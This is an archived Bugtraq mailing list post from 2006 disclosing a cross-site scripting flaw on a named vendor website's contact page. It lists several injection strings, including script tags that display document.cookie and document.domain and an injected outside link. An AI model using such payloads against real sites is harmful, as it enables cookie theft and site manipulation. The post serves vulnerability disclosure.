Home page logo
/

bugtraq logo Bugtraq mailing list archives

XSS Bug in OpenGear Server Website
From: Aditya () Metaeye Org
Date: 24 Apr 2006 14:50:40 -0000

0x0*] Advisory 
==============

Web Penetrated By:- Aditya () Metaeye Org
=======================================
Hit                     :- Site Manipulation.
====
Vulnerability   :- XSS Injection && CSS Injection OpenGear WebSite
==============
BrowserStatus   :- Windows IE 6.0
==============

Injections      :-
==========         0x01] ' && ""
                   0x02] <script>Javascript:alert("Penetrated");</script>
                   0x03] <p>Penetrated</p>
                   0x04] <a href ="www.zeroknock.cjb.net">ZeroKnock</a>
                   0x05] '';!--"<CSS_Check>=&{()}
                   0x06] '<script>javascript:alert(document.cookie);</script>
                   0x07]  '<script>javascript:alert(document.domain);</script>
                          

                                Result:-Opengear.com with alert injection.
                        
                   0x01] document.domain Injection Yields --> Opengear.com
                   0x02] document.cookie Injection Yields --> Empty string
                   0x03] Remote Linking Is Possible <a href=""></a> Working.
                   0x04] The OutBound Attack Is Also Definitive.

Site            :- http://www.Opengear.com
=======    
Vulnerable Link:
================    http://www.opengear.com/cm4000_nwcontact.html


Explanation     :- 
=============
                
[+] Poorly Coded Modules.
[+] No Patch For Ignorance.

                =========================================================               


  By Date           By Thread  

Current thread:
  • XSS Bug in OpenGear Server Website Aditya (Apr 24)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]